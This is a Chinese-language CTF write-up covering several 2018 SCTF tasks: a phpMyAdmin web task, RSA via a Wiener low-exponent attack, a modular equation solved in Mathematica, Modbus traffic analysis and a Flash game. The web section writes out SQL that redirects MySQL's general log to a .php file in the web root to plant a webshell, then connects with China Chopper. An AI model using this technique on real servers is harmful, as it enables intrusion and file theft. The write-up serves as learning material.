2018 SCTF 部分wp

弱弱的web狗表示简直就没有活路....

Web

easiest  web-phpmyadmin

参考这篇:地址

执行以下sql语句:

set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php';
SELECT ''

用菜刀连一下:

2018 SCTF 部分wp_第1张图片

成功,找目录里文件,C盘有个flag.txt:

2018 SCTF 部分wp_第2张图片

2018 SCTF 部分wp_第3张图片

Crypto

it may contain flag

题目简单粗暴直接给了RSA的n,e,c 首先尝试一波分解n,分解出n此题就结束了

http://factordb.com/ 尝试分解,无果。

观察这个e竟然这么大,那就可能存在低解密指数攻击。 具体请参考这篇文章:https://www.anquanke.com/post/id/84632

这篇总结CTF中RSA攻击姿势很全面。

尝试低解密指数攻击,直接用Github上的源码跑就行(运行RSAwienerHacker.py就行,调用hack_RSA方法)


发现跑出了私钥d,所以直接解密就完了:

c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3
d=731297
n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf
m=pow(c,d,n)
print 'sctf{'+hex(m)[2:len(hex(m))-1].decode('hex')+'}'

得到flag:



A Number Problem

更加简单粗暴 题目两行:

x**33=1926041757553905692219721422025224638913707 mod 3436415358139016629092568198745009225773259
tell me the smallest answer of x

解方程,解出x应该flag就出来了。

看到这个题,第一反应又考了一个RSA?

分解一波N发现可以分解,计算(p-1)*(q-1),然后计算私钥发现不对... e与n的欧拉值不互素,RSA条件不满足

不死心 想到今年HUMEN CTF有一道题也是不互素情况,直接拿11当e去算私钥最后结果开三次方,拿到结果美滋滋去交....

各种姿势交都不对....

把结果代入题目,发现根本就不对。。。

找问题 发现了开3次方失败了,也就是说不能正好开出三次方,这是近似值。

死心了 看来不是RSA

此时看题 才发现让我学习数论.... 粗心走的弯路啊

学数论解方程emmmmm(不适合小白)走一波工具 使用mathematica尝试求解

命令: solve[x^33==1926041757553905692219721422025224638913707,{x},Modulus->3436415358139016629092568198745009225773259]

解出x:(2333又偷出了一道题)

2018 SCTF 部分wp_第4张图片

最小的结果是flag,将x转为字符串发现是乱码,直接交SCTF{x}就过了。

早点想起mathematics没准还能拿个前三2333(逃... 数论大佬别打我)


MISC

签到:

考手速。万年单身狗手速还是不行.... 感觉很快了还是才第十 严重怀疑前几是不是脚本跑的2333

神奇的ModBus:

流量分析,题目说modbus,查一下发现是个协议。流量包中有这个协议的流量,直接wireshark筛选出了modbus协议的包

追踪TCP流,发现整个TCP流都充斥着这个flag:


sctf{Easy_Mdbus} 直接去交发现不行

换了各种姿势 大小写 、点都试过了交了一万遍flag都不行mmp

简直了 还能有假flag 

研究了一会Modbus协议  盯着流量包盯了半天感觉什么东西都分析不出来了。。。

晚上吃过饭再交一下上面的flag成了.... 真是mmp 不知道题目平台验证flag的程序出了bug还是我有毒(心中cnm在奔腾)

肥宅快乐题:

开始打游戏... 是个flash 播放器打开能跳关的 既然通关就给flag那就快进到最后 发现对话里并没有flag

从头到尾跳帧翻 还是没有...

然后队里一个大佬翻到了flag2333(我有毒) 请教了发现md我的播放器有毒(辣鸡迅雷影音)平时不咋用电脑看视频的痛

换个Potplayer 翻到差不多57帧的时候 出现这个动画:

2018 SCTF 部分wp_第5张图片

一直点击对话就得到了flag:

2018 SCTF 部分wp_第6张图片

见识了见识了...


总结:

web完全做不动... 

建议板那道XSS成功弹框不知道干啥了.. 打cookie发现没有东西,有师傅发了wp才发现自己才踏出万里长征的第一步...

misc侧信道和神秘的交易 都是新知识 看来快速学习能力太差了...

Crypto 那道ELGamal 密码学刚讲这个 不知道有什么攻击姿势 感觉应该是同一flag用不同随机数加密了两次 把两对c1,c2给出了 但是不会用...

还是只会偷题的小白....坐等大手子各师傅们的wp学习一波...


你可能感兴趣的:(wp)